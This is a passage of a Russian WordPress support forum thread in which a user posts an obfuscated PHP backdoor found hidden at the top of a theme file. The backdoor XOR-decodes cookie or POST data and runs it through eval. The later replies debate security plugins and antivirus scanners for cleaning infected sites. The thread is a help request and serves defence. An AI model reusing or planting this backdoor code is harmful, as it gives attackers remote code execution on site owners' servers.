Поддержка Проблемы и решения Странный код в файле

  • Привет подскажите что это за страный код в начали файла ? это вирус или нет ?

    
    $qff9a = 471;$GLOBALS['i6e2c']=Array();global$i6e2c;$i6e2c=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['s43e04b']="\x79\x41\x68\x47\x71\x37\x43\x73\x2b\x9\x5e\x38\x33\x3a\x3d\x60\x7e\x4e\x21\x75\x6c\x4c\x7b\x45\x2d\x4a\x59\x44\x35\x78\x3f\x25\x30\x70\x4b\x6b\x5f\x6f\x5a\x52\x29\x61\x55\x63\x28\x6e\x34\x7d\x4f\x26\x4d\x49\x7a\x2c\x6d\x3b\x40\x57\x53\x42\x39\x51\x3e\x48\x50\x77\x2a\x36\x7c\x20\x24\x74\x72\xa\x62\x56\x27\xd\x5d\x3c\x2f\x64\x58\x22\x67\x66\x23\x5c\x5b\x46\x6a\x54\x31\x69\x65\x76\x32\x2e";$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][96]]=$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][2].$i6e2c['s43e04b'][72];$i6e2c[$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][46]]=$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][81];$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][60]]=$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][45];$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][94]]=$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][45].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][71];$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][81]]=$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][52].$i6e2c['s43e04b'][94];$i6e2c[$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][74]]=$i6e2c['s43e04b'][33].$i6e2c['s43e04b'][2].$i6e2c['s43e04b'][33].$i6e2c['s43e04b'][95].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][45];$i6e2c[$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][41]]=$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][45].$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][52].$i6e2c['s43e04b'][94];$i6e2c[$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][43]]=$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][67].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][94];$i6e2c[$i6e2c['s43e04b'][0].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][41]]=$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][54].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][54].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][71];$i6e2c[$i6e2c['s43e04b'][90].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][67].$i6e2c['s43e04b'][5]]=$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][46];$i6e2c[$i6e2c['s43e04b'][4].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][81]]=$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][28];$i6e2c[$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][5]]=$_POST;$i6e2c[$i6e2c['s43e04b'][90].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][12]]=$_COOKIE;@$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][94]]($i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][84],NULL);@$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][94]]($i6e2c['s43e04b'][20].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][84].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][7],0);@$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][94]]($i6e2c['s43e04b'][54].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][45].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][54].$i6e2c['s43e04b'][94],0);@$i6e2c[$i6e2c['s43e04b'][0].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][41]](0);$e271c71=NULL;$qfe70a=NULL;$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][67].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][5]]=$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][24].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][24].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][24].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][24].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][67].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][92];global$u6f1c2e47;function b939eb25($e271c71,$o094c62){global$i6e2c;$x2d81e="";for($e29dc95a=0;$e29dc95a<$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][60]]($e271c71);){for($b49c=0;$b49c<$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][60]]($o094c62)&&$e29dc95a<$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][60]]($e271c71);$b49c++,$e29dc95a++){$x2d81e.=$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][96]]($i6e2c[$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][46]]($e271c71[$e29dc95a])^$i6e2c[$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][46]]($o094c62[$b49c]));}}return$x2d81e;}function e7024($e271c71,$o094c62){global$i6e2c;global$u6f1c2e47;return$i6e2c[$i6e2c['s43e04b'][4].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][81]]($i6e2c[$i6e2c['s43e04b'][4].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][81]]($e271c71,$u6f1c2e47),$o094c62);}foreach($i6e2c[$i6e2c['s43e04b'][90].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][12]]as$o094c62=>$b5fef87d){$e271c71=$b5fef87d;$qfe70a=$o094c62;}if(!$e271c71){foreach($i6e2c[$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][5]]as$o094c62=>$b5fef87d){$e271c71=$b5fef87d;$qfe70a=$o094c62;}}$e271c71=@$i6e2c[$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][41]]($i6e2c[$i6e2c['s43e04b'][90].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][67].$i6e2c['s43e04b'][5]]($i6e2c[$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][43]]($e271c71),$qfe70a));if(isset($e271c71[$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][35]])&&$u6f1c2e47==$e271c71[$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][35]]){if($e271c71[$i6e2c['s43e04b'][41]]==$i6e2c['s43e04b'][93]){$e29dc95a=Array($i6e2c['s43e04b'][33].$i6e2c['s43e04b'][95]=>@$i6e2c[$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][74]](),$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][95]=>$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][97].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][24].$i6e2c['s43e04b'][92],);echo@$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][81]]($e29dc95a);}elseif($e271c71[$i6e2c['s43e04b'][41]]==$i6e2c['s43e04b'][94]){eval/*e0d527d*/($e271c71[$i6e2c['s43e04b'][81]]);}exit();} ?>
    
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  <?php wp_nav_menu( array( 
              'theme_location' => 'sidebar-menu',
              'menu_class' => false,
              'menu_id' => false,
              'container_class' => 'nav',
              'container_id' => false
            ) ); ?>     
            
    				<div class="anons">
    						<h3>Анонсы</h3>            
                <a class="sorder-desc" href="/?sorder=ASC">Сортировка по дате: <i class="fa fa-arrow-down" aria-hidden="true"></i></a>
                <a class="sorder-asc" href="/?sorder=DESC">Сортировка по дате: <i class="fa fa-arrow-down" aria-hidden="true"></i></a>
                <ul>
                  <?php 
                  $posts = get_posts( array(
                    'numberposts'     => 5, // тоже самое что posts_per_page
                    'offset'          => 0,
                    'category'        => 3,
                    'orderby'         => 'post_date',
                    'order'           => 'DESC',
                    'include'         => '',
                    'exclude'         => '',
                    'meta_key'        => '',
                    'meta_value'      => '',
                    'post_type'       => 'post',
                    'post_mime_type'  => '', // image, video, video/mp4
                    'post_parent'     => '',
                    'post_status'     => 'publish'
                  ) );
                  foreach($posts as $post){ setup_postdata($post);      
                    $tags = wp_get_post_tags($post->ID);            
                    echo '
                      <li>
                        <div class="anons_content_img">
                          <a href="'.get_the_permalink().'">'.get_the_post_thumbnail($post->ID).' </a>
                          <small>'.get_the_date('d.m.Y').'</small>
                        </div>
                        <div class="anons_content_post">
                          <a href="'.get_the_permalink().'" class="anons_content_post_firm">'.get_the_author_meta( 'nickname', $post->post_author).'</a>                      
                          <a href="'.get_bloginfo('url').'/tag/'.$tags[0]->slug.'" class="anons_content_post_power">'.$tags[0]->name.'</a>
                          <p><a href="'.get_the_permalink().'">'.my_sub(get_the_title(), 80).'</a></p>
                        </div>  
                      </li>
                    ';
                  }
                  wp_reset_postdata();
                  ?>   
                </ul>          
                
    
    				</div>        
    				<div class="comments">
    						<h3>Последние комментарии</h3>
                
                <ul><?php wp_recentcomments(); ?></ul>            
                
    
    				</div>
    • Тема изменена 5 лет, 1 месяц назад пользователем matros97.
    • Тема изменена 5 лет, 1 месяц назад пользователем Yui. Причина: странный пишется с 2 н
Просмотр 15 ответов — с 16 по 30 (всего 36)
  • Только то что, этот плагин служит для других целей

    SeVlad, а каким именно целям он служит? Поясните. Я по вашему комменту вообще подумал, что он сливает что-то кому-то, например «большому брату»…

    а каким именно целям он служит?

    Почитайте на странице плагина и его документации.

    @sevlad

    Я всё прочитал, но ничего такого «опасного» не нашел.
    Вы приведите конкретные цитаты из документации, скриншоты и куски кода, где будет видно, что плагин опасен. Исходных код открыт для аудита.

    из опасного — он очень часто ругается на якобы «зловредный» код, который таковым не является. даже без параноидального режима. новички удаляют все, что находит плагин и сталкиваются с необходимостью восстанавливать сайт из бэкапа.

    вообще, лучше все работают плагины проверки целостности файлов на регулярной основе. увидели, что какие то файлы изменились — сигнал их сносить, ставить чистые версии из репозитория и искать в логах дырку.

    ну а если просят чистить клиентский сайт от вирусов — то качаем сайт целиком и проверяем локально через ai-bolit. выясняем степень заражения — иногда движок загажен вирусами так, что проще снести все файлы и установить все заново.

    @flector

    ai-bolit в обычном режиме не видит вообще практически ничего (если это не самое примитивное заражение сайта), в параноидальном докапывается до всего. Т.е. понять, что именно заражено, а что было изначально прописано в плагине тяжело (без привязки к репозиториям WP).

    Wordfednce в обычном режиме все вирусы удалил. Всего пару раз за полгода бывали ложные срабатывания, но я не новичок. 🙂

    По поводу новичков вообще спорный вопрос. Раз уж они поставили сайт на WP, установили плагины, скачали какой-то вредный плагин с левого сайта, поймали вирус, поняли это, нашли антивирус, провели сканирование и как-то локализовали проблему — они уже неплохо прокачались в этом)) Тяжело таких людей назвать новичками.

    Понятно, что все работают в интернете на свой страх и риск. И это надо писать на каждом плагине большими буквами в самом начале. Я считаю, что лучше набить шишки и больше не делать подобных ошибок, чем бояться вообще сделать хоть какой-нибудь шаг. Нужно пройти через это — опыт приходит с опытом.

    Другие плагины, которые предлагали для сканирования сайта (тут не были упомянуты) вообще выдают кучу срабатываний на пустом месте. Потом не разгребешь эти логи.

    Всё сносить я бы стал только в самом крайнем случае (и то сомневаюсь). Достаточно переставить пару плагинов, а остальные файлы просканировать. Еще есть кнопка переустановки последнего обновления WP (wp-admin/update-core.php)

    Опять же — это не плагин опасный, а пользователь глупый.
    Ножом можно хлеб нарезать, а можно и порезаться.

    но ничего такого «опасного» не нашел.

    Я говорил «опасный»? Или Вы сами это придумали и приписали мне?
    Читаем внимательно что я говорил:

    Нечего на движок перекладывать серверные задачи. И вирусы тоже не нужно искать движком. На то есть другие средства, не мешающие работе сайта.

    Думаем, чем это чревато.

    Но именно глупые пользователи, которые не могут написать несколько строк в хтацесе, следить за логами, мониторить нагрузку и тд их используют.

    Ножом можно хлеб нарезать, а можно и порезаться.

    В данном случае нож — это серверные и др. инструменты. А плагины — скафандр с ненадёжной нитью между колен, которой и предлагается резать хлеб.

    И @airathalitov, достаточно уже не по теме топика флудить. Есть вопросы — см правила форума, п2: Не задавайте вопросы в чужих темах — для полноценного обсуждения создайте свою.

    @sevlad

    Какая странная метафора со скафандром))

    Я согласен, что надо закругляться (я уже давно предложил закрыть вопрос), но довольно развернутое общение получилось. Хотя всё в рамках темы «Странный код на сайте«, т.е. не вижу нарушения правил.

    Остальные пользователи сайта зайдут потом сюда, прочтут комментарии и будут знать всё необходимое о том, как бороться с вредоносным кодом на сайте (сразу несколько версий решения).

    Всем спасибо!

    ai-bolit в обычном режиме не видит вообще практически ничего (если это не самое примитивное заражение сайта)

    я вам не верю.
    просто потому, что имею огромный опыт лечения сайтов именно через ai-bolit.
    и он же установлен на куче российских хостингов (аля beget и прочие).

    профессиональный антивирус против плагина-поделки. хм.

    я вам не верю.

    Хорошо

    просто потому, что имею огромный опыт лечения сайтов именно через ai-bolit.

    У меня нет такого огромного опыта. И я использовал бесплатную версию.
    Если у вас в руке молоток — любая проблема кажется гвоздем. 🙂

    и он же установлен на куче российских хостингов (аля beget и прочие).

    У меня на reg.ru и hostiman его почему-то нет (я точно не видел). Было бы неплохо, если поставят (может напишу им в поддержку).

    профессиональный антивирус против плагина-поделки. хм.

    Не обесценивайте труд разработчиков.
    Этот «плагин-поделка» с 2 миллионами активных установок, 35 миллионами общих скачиваний и рейтингом в 5 звезд. Не каждый плагин может этим похвастаться.

    Но профессиональный антивирус в любом случае лучше, просто он не всегда под рукой (либо платный).

    профессиональный антивирус против плагина-поделки

    Ну справедливости ради — аболит тоже поделка и даже будет ровесником wordfence-а. Хотя на сегодня значительно «подрос» и является достаточно эффективным средством для поиска зловредов. Но и не панацей.

    У меня на reg.ru и hostiman его почему-то нет

    недохостеры. а антивирусы у них есть — только не для публичного использования. зато в случае нахождения вирусов ваш сайт моментально лишится серверных ресурсов и возможности отсылки писем. причем, что погано — результаты ативирусной проверки они вам не предоставят.

    Не обесценивайте труд разработчиков.
    Этот «плагин-поделка» с 2 миллионами активных установок, 35 миллионами общих скачиваний и рейтингом в 5 звезд. Не каждый плагин может этим похвастаться.

    эти цифры ни о чем. 2 самых популярных SEO-плагина имеют больше и скачиваний и установок, но, тем не менее, они ужасны и по коду и по интерфейсу.

    ваш плагин плох тем, что его разрабатывает не команда антивирусописателей. он комбайн и антивирус там всего лишь одна маленькая опция — которая работает поскольку-постольку.

    Ну справедливости ради — аболит тоже поделка и даже будет ровесником wordfence-а. Хотя на сегодня значительно «подрос» и является достаточно эффективным средством для поиска зловредов. Но и не панацей.

    только хороший продукт из кустарной поделки может превратиться в хорошую вещь. в свое время и касперский и др.веб тоже были поделками.

    только вот ai-bolit пошел по пути улучшения поиска вирусов, а wordfence по пути наращивания стороннего функционала. что в итоге лучше и так ясно.

    в свое время manul от яндекса грозился стать номером один, но они на него забили 🙁

    Я бы профессиональным антивирусом назвал Dr.Web (у меня стояла лицензия одно время на винде, сейчас на линукс переехал). Он моментально реагировал на опасности внутри кода какого-нибудь плагина.

    У них еще есть бесплатная утилита: https://free.drweb.ru/cureit/

    А стандартный виндовый антивирус в Win10 в упор не видел вредоносного кода, когда я в него его «носом тыкал».

    • Ответ изменён 5 лет назад пользователем Airat Halitov🔥.

    Я бы профессиональным антивирусом назвал Dr.Web (у меня стояла лицензия одно время на винде, сейчас на линукс переехал).

    и др.веб и касперский очень плохо находят вредоносный код в сайтах. реагируют только на точно известные сигнатуры. а «точно известно» и web это вещи мало совместимые.

    хотя мне до сих приходится отключать касперского при скачивании зараженных клиентских сайтов — иначе половину файлов он тупо удалит.

Просмотр 15 ответов — с 16 по 30 (всего 36)
  • Тема «Странный код в файле» закрыта для новых ответов.